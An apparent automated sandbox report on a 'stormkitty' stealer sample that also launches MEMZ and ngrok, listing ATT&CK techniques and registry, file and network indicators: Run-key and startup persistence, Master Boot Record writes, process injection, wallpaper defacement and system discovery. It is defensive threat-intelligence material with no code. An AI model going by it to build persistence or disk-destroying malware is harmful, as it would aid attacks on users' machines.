stormkitty | ab6fed54d7e8fcd47d2888aae95498968192e13aaab8f8a09880b602ea98e81c

System Information Discovery

Processes:

WScript.exeMEMZ.exeMEMZ.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	MEMZ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	MEMZ.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk	powershell.exe

Executes dropped EXE 12 IoCs

Processes:

System Userngrok.exeSystem UserSystem UserSystem UserMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exe

pid	process
3616	System User
1952	ngrok.exe
1864	System User
1732	System User
2360	System User
5972	MEMZ.exe
5844	MEMZ.exe
5220	MEMZ.exe
5224	MEMZ.exe
5940	MEMZ.exe
4656	MEMZ.exe
5656	MEMZ.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System User = "C:\\Users\\Admin\\AppData\\Roaming\\System User"	powershell.exe

Drops desktop.ini file(s) 17 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	powershell.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-2170637797-568393320-3232933035-1000\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	powershell.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

288 raw.githubusercontent.com
287 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

17 ip-api.com
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

MEMZ.exe

description ioc process

File opened for modification \??\PhysicalDrive0 MEMZ.exe

flow	ioc
288	raw.githubusercontent.com
287	raw.githubusercontent.com

flow	ioc
17	ip-api.com

description	ioc	process
File opened for modification	\??\PhysicalDrive0	MEMZ.exe

Drops file in System32 directory 2 IoCs

Processes:

chrome.exe

description	ioc	process
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp"	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3752 set thread context of 5108 3752 powershell.exe cvtres.exe
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 3752 set thread context of 5108	3752	powershell.exe	cvtres.exe

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

ngrok.exeMEMZ.exepowershell.exeMEMZ.exeMEMZ.exeMEMZ.exeexplorer.exeMEMZ.exeMEMZ.execvtres.exeMEMZ.exenotepad.exeIEXPLORE.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ngrok.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MEMZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MEMZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MEMZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MEMZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MEMZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MEMZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MEMZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	notepad.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

firefox.exefirefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

Processes:

chrome.exemsedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4248 taskkill.exe

pid	process
4248	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 37 IoCs

adware spyware

Modify Registry

Processes:

iexplore.exeIEXPLORE.EXEexplorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3230489867"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009a7bf3bae5f3a549b81f23758225dc5c0000000002000000000010660000000100002000000097943eff7644d7db102705cee49f1f7211b49e43fa9a7a3216c5862a21fefd3b000000000e8000000002000020000000b1e6d883bcd6d846c577d339e9e807b44fbdd02c03f84c976844ba2d62a4395c200000001dd77d23fd398bcffe8926ecd200ce8a21bfb97f2b193af7f3ab3706e4b6b33f4000000068a1920ee59507af67c93083a247b1e3a4199028b75673f30e4dbb4180a3558a7f90f46159f007637c54f3cbc939212d79435acbe2aaca9536ff76e50b612aca	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009a7bf3bae5f3a549b81f23758225dc5c00000000020000000000106600000001000020000000166ef43981c7b9d7a4840dd16f2e3619c828767bdcef4e6523b5a60e759c46da000000000e8000000002000020000000d351d725c9da9e30ccb4d7611ffd65c45f7db09548fa07c6757cedf15d60304e2000000066a59a41bac742755b900b52e7777d156854625a7527f240e51c629ad89e69d840000000088d6f6e7d6f329a49fe69ac415e82869eb55acd0546778887373cc92aa9046f62cd15501a1d1765073c5c90d7c3932620d2311c21a84027ed22b13bf727509b	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70d082c177feda01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31129207"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{EC02B3C3-6A6A-11EF-A2A4-CA89CBF88D4A} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3230489867"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60fc89c177feda01	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31129207"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE

Modifies data under HKEY_USERS 18 IoCs

Processes:

LogonUI.exechrome.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "66"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133698928198350541"	msedge.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe

Modifies registry class 45 IoCs

Processes:

explorer.exefirefox.exemsedge.exepowershell.exepowershell.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Rev = "0"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616209"	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2170637797-568393320-3232933035-1000\{D62D31EB-3D9A-4186-B756-F6AAFB606196}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{d3162b92-9365-467a-956b-92703aca08af}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193"	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

3656 NOTEPAD.EXE
Runs net.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

